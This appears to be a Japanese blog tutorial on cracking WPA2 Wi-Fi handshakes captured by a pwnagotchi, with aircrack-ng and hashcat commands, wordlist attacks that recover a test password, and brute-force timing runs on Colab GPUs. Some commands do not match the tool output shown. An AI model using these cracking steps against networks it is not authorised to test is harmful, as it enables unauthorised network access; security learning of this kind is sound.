履歴
2021/08/14 hashcat -m 2500 が廃止されました。 hashcat -m 22000 です。
2021/06/18 Google Colaboratory の無料利用枠が使わせてくれません。
pcap ファイルの分析
pwnagotchi の作り方はこちら( https://qiita.com/k0uj1k/items/f91a3b7e3a4b9209774f )
pwnagotchi が handshakes した pcap ファイルを Kali linux へ 持ってきます。
辞書から照合していきます。
辞書のダウンロード
# git clone https://github.com/kennyn510/wpa2-wordlists.git
pwnagotchi からの取り込み
damedame_xxxxxxxxxxxxxx.pcap を使って分析します。
Kali Linux で handshakes ディレクトリが参照できるようにしておきます。
ここから、
# scp -pr pi@10.0.0.2:/home/pi/handshakes ~
# cp ~/handshakes/damedame_xxxxxxxxxxxxxx.pcap ~/work
# cd work
work ディレクトリで作業します。
aircrack-ng で分析
引数にESSIDが必要です、ほとんどの場合ファイル名の_の前がESSIDですが、ESSID に-などが含まれているとファイル名と違う場合があるので、tsharkで確認します。
# tshark -r damedame_xxxxxxxxxxxxxx.pcap
(略)
4 -0.016541 ABCDEFG_aa:aa:aa → Apple_00:00:00 802.11 209 Probe Response, SN=2282, FN=0, Flags=........C, BI=100, SSID=damedame
(略)
SSID=damedame と確認できます。
aircrack-ng
ダウンロードした辞書を使って分析をします。
# 今回は例として”P”から始まる絞り込んだ辞書を使いました。
# aircrack-ng damedame_xxxxxxxxxxxxxx.pcap -w wpa2-wordlists/Wordlists/Rockyou/P.txt -e damedame
分析画面に(全画面表示に)変わります。
分析画面
辞書照合していきます。
Aircrack-ng 1.6
[00:00:16] 53586/536377 keys tested (3401.86 k/s)
Time left: 2 minutes, 21 seconds 9.99%
KEY FOUND! [ password123 ]
Master Key : 6C DC 28 E5 EE D6 0D D3 24 8D 42 A9 94 FA 40 DA
8F C6 7B 3B BB 4E F2 32 84 48 E7 D5 47 3A A4 E7
Transient Key : D8 8F 19 22 3B 86 AD B3 25 E7 E4 93 BA 54 9D A4
95 0E D5 5F 6F 8B 09 BE 26 D0 91 F5 47 90 3F 11
9A AB 21 45 F3 EC 45 F4 0C 19 02 13 7C DB 8E 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
EAPOL HMAC : CB A5 D7 88 A6 CF 36 71 CB 53 F6 EB CC 8C BE CC
あらら、発見されましたね。
2分半ぐらいかかりましたね。
hashcat で内容分析
pcap ファイル からhccapx ファイルへの返還のために hashcat-utils を利用します。
hashcat-utils のビルド
# git clone https://github.com/hashcat/hashcat-utils
# cd hashcat-utils
# cd src
# make
# cd ../..
pcap ファイルを変換
に pcap ファイルをアップロードして、convert した後、ダウンロードします。
zzzzzz.hc22000 拡張子が hc22000 というファイルを取得します。
hashcat -m22000
こちらでも、ダウンロードした辞書を使って分析をします。
# 今回は例として”P”から始まる絞り込んだ辞書を使いました。
# hashcat --force -m 22000 damedame_xxxxxxxxxxxxxx.hccapx wpa2-wordlists/Wordlists/Rockyou/P.txt
hashcat (v5.1.0) starting...
OpenCL Platform #1: The pocl project
====================================
* Device #1: pthread-Intel(R) Core(TM) i7-7500U CPU @ 2.70GHz, 1024/2955 MB allocatable, 2MCU
Hashes: 7 digests; 6 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Applicable optimizers:
* Zero-Byte
* Single-Salt
* Slow-Hash-SIMD-LOOP
Minimum password length supported by kernel: 8
Maximum password length supported by kernel: 63
Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.
* Device #1: build_opts '-cl-std=CL1.2 -I OpenCL -I /usr/share/hashcat/OpenCL -D LOCAL_MEM_TYPE=2 -D VENDOR_ID=64 -D CUDA_ARCH=0 -D AMD_ROCM=0 -D VECT_SIZE=8 -D DEVICE_TYPE=2 -D DGST_R0=0 -D DGST_R1=1 -D DGST_R2=2 -D DGST_R3=3 -D DGST_ELEM=4 -D KERN_TYPE=2500 -D _unroll'
Dictionary cache built:
* Filename..: wpa2-wordlists/Wordlists/Rockyou/P.txt
* Passwords.: 536377
* Bytes.....: 5367337
* Keyspace..: 536377
* Runtime...: 0 secs
346f71dc3e3a2693d747d437217829e5:yyyyyyyyyyyy:xxxxxxxxxxxx:damedame:password123
17d763d85546808a1a77ac2228c1c3c7:yyyyyyyyyyyy:xxxxxxxxxxxx:damedame:password123
41e2bb5f70b2ca7ae6b25832342b06c6:yyyyyyyyyyyy:xxxxxxxxxxxx:damedame:password123
04173eeb81c18a45d16816d063ec0479:yyyyyyyyyyyy:xxxxxxxxxxxx:damedame:password123
b4fe69e2cfcc15df3caffe4b6adc3a2a:yyyyyyyyyyyy:zzzzzzzzzzzz:damedame:password123
[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit =>
また発見されましたね。
[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit => s
Session..........: hashcat
Status...........: Running
Hash.Type........: WPA-EAPOL-PBKDF2
Hash.Target......: damedame_xxxxxxxxxxxxxx.hccapx
Time.Started.....: Wed May 6 20:27:58 2020 (26 secs)
Time.Estimated...: Wed May 6 20:30:03 2020 (1 min, 39 secs)
Guess.Base.......: File (wpa2-wordlists/Wordlists/Rockyou/P.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 3807 H/s (6.84ms) @ Accel:512 Loops:128 Thr:1 Vec:8
Recovered........: 5/6 (83.33%) Digests, 0/1 (0.00%) Salts
Progress.........: 157123/536377 (29.29%)
Rejected.........: 58819/157123 (37.44%)
Restore.Point....: 156773/536377 (29.23%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:3712-3840
Candidates.#1....: putol_003 -> putalamierda5673
1分半ですか。
hashcat では辞書なしで分析ができますが、
https://hashcat.net/hashcat/
によると、
GPU Driver requirements:
+ AMD GPUs on Linux require "RadeonOpenCompute (ROCm)" Software Platform (1.6.180 or later)
+ AMD GPUs on Windows require "AMD Radeon Software Crimson Edition" (15.12 or later)
+ Intel CPUs require "OpenCL Runtime for Intel Core and Intel Xeon Processors" (16.1.1 or later)
+ Intel GPUs on Linux require "OpenCL 2.0 GPU Driver Package for Linux" (2.0 or later)
+ Intel GPUs on Windows require "OpenCL Driver for Intel Iris and Intel HD Graphics"
+ NVIDIA GPUs require "NVIDIA Driver" (367.x or later)
とGPUドライバが必要です。
無い場合は、ものすごく時間がかかります
Session..........: hashcat
Status...........: Quit
Hash.Name........: WPA-EAPOL-PBKDF2
Hash.Target......: damedame_xxxxxxxxxxxxxx.hccapx
Time.Started.....: Wed Jun 3 15:16:52 2020 (3 mins, 39 secs)
Time.Estimated...: Next Big Bang (9196 years, 212 days)
Guess.Mask.......: ?l?l?l?l?l?l?l?l?d?d?d?d [12]
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 7196 H/s (393.18ms) @ Accel:16 Loops:1024 Thr:1024 Vec:1
Recovered........: 0/94 (0.00%) Digests
Progress.........: 1572864/2088270645760000 (0.00%)
Rejected.........: 0/1572864 (0.00%)
Restore.Point....: 49152/80318101760000 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:18-19 Iteration:0-94
Candidates.#1....: wtfwnane1234 -> wwvgonan1234
9200年かかる。
GPUをぶん回してみたいです。
Google Colaboratory
GPUを無料でぶん回してみたかったので、Google Colaboratory で試してみました。
hashcat (v6.0.0-33-g75d801e1) starting...
* Device #1: This hardware has outdated CUDA compute capability (3.7).
For modern OpenCL performance, upgrade to hardware that supports
CUDA compute capability version 5.0 (Maxwell) or higher.
* Device #2: This hardware has outdated CUDA compute capability (3.7).
For modern OpenCL performance, upgrade to hardware that supports
CUDA compute capability version 5.0 (Maxwell) or higher.
nvmlDeviceGetFanSpeed(): Not Supported
CUDA API (CUDA 10.1)
====================
* Device #1: Tesla K80, 11373/11441 MB, 13MCU
OpenCL API (OpenCL 1.2 CUDA 10.1.152) - Platform #1 [NVIDIA Corporation]
========================================================================
* Device #2: Tesla K80, skipped
Minimum password length supported by kernel: 8
Maximum password length supported by kernel: 63
Hashes: 7 digests; 6 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Applicable optimizers applied:
* Zero-Byte
* Single-Salt
* Brute-Force
* Slow-Hash-SIMD-LOOP
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 292 MB
[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit => s
Session..........: hashcat
Status...........: Running
Hash.Name........: WPA-EAPOL-PBKDF2
Hash.Target......: damedame_xxxxxxxxxxxx.hccapx
Time.Started.....: Fri Jul 10 09:05:02 2020 (20 secs)
Time.Estimated...: Wed Jun 25 18:01:21 2769 (748 years, 350 days)
Guess.Mask.......: ?l?l?l?l?l?l?l?l?d?d?d?d [12]
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 88356 H/s (73.13ms) @ Accel:32 Loops:64 Thr:1024 Vec:1
Recovered........: 0/6 (0.00%) Digests
Progress.........: 1703936/2088270645760000 (0.00%)
Rejected.........: 0/1703936 (0.00%)
Restore.Point....: 0/80318101760000 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:4-5 Iteration:832-896
Candidates.#1....: aarierin1234 -> aqmbxxxx1234
Hardware.Mon.#1..: Temp: 50c Util:100% Core: 823MHz Mem:2505MHz Bus:16
[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit =>
Tesla K80, 2860/11441 MB allocatable, 13MCU でも 750年 かかるのか!
hashcat (v6.0.0-34-g57776832) starting...
nvmlDeviceGetFanSpeed(): Not Supported
CUDA API (CUDA 10.1)
====================
* Device #1: Tesla T4, 14969/15079 MB, 40MCU
OpenCL API (OpenCL 1.2 CUDA 10.1.152) - Platform #1 [NVIDIA Corporation]
========================================================================
* Device #2: Tesla T4, skipped
Minimum password length supported by kernel: 8
Maximum password length supported by kernel: 63
Hashes: 7 digests; 6 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Applicable optimizers applied:
* Zero-Byte
* Single-Salt
* Brute-Force
* Slow-Hash-SIMD-LOOP
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 766 MB
[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit => s
Session..........: hashcat
Status...........: Running
Hash.Name........: WPA-EAPOL-PBKDF2
Hash.Target......: damedame_xxxxxxxxxxxx.hccapx
Time.Started.....: Fri Jul 10 12:51:07 2020 (26 secs)
Time.Estimated...: Mon Dec 21 14:26:15 2212 (192 years, 163 days)
Guess.Mask.......: ?l?l?l?l?l?l?l?l?d?d?d?d [12]
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 343.9 kH/s (58.81ms) @ Accel:8 Loops:256 Thr:1024 Vec:1
Recovered........: 0/6 (0.00%) Digests
Progress.........: 8847360/2088270645760000 (0.00%)
Rejected.........: 0/8847360 (0.00%)
Restore.Point....: 327680/80318101760000 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:1-2 Iteration:512-768
Candidates.#1....: mefjyone1234 -> midgkine1234
Hardware.Mon.#1..: Temp: 62c Util:100% Core:1200MHz Mem:5000MHz Bus:16
[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit => s
Tesla T4, 14969/15079 MB, 40MCU をたまたまつかんだんだけど、これでも 193年かかるのか!
hashcat (v6.0.0-34-g57776832) starting...
nvmlDeviceGetFanSpeed(): Not Supported
CUDA API (CUDA 10.1)
====================
* Device #1: Tesla P100-PCIE-16GB, 16017/16280 MB, 56MCU
OpenCL API (OpenCL 1.2 CUDA 10.1.152) - Platform #1 [NVIDIA Corporation]
========================================================================
* Device #2: Tesla P100-PCIE-16GB, skipped
Minimum password length supported by kernel: 8
Maximum password length supported by kernel: 63
Hashes: 7 digests; 6 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Applicable optimizers applied:
* Zero-Byte
* Single-Salt
* Brute-Force
* Slow-Hash-SIMD-LOOP
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 1047 MB
[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit => s
Session..........: hashcat
Status...........: Running
Hash.Name........: WPA-EAPOL-PBKDF2
Hash.Target......: damedame_xxxxxxxxxxxx.hccapx
Time.Started.....: Sat Jul 11 12:11:10 2020 (25 secs)
Time.Estimated...: Fri Apr 1 19:23:00 2163 (142 years, 264 days)
Guess.Mask.......: ?l?l?l?l?l?l?l?l?d?d?d?d [12]
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 463.7 kH/s (60.73ms) @ Accel:16 Loops:128 Thr:1024 Vec:1
Recovered........: 0/6 (0.00%) Digests
Progress.........: 11010048/2088270645760000 (0.00%)
Rejected.........: 0/11010048 (0.00%)
Restore.Point....: 0/80318101760000 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:12-13 Iteration:2176-2304
Candidates.#1....: harierin1234 -> hwhieyon1234
Hardware.Mon.#1..: Temp: 49c Util:100% Core:1328MHz Mem: 715MHz Bus:16
Tesla P100-PCIE-16GB, 16017/16280 MB, 56MCU だと、143年 かかる。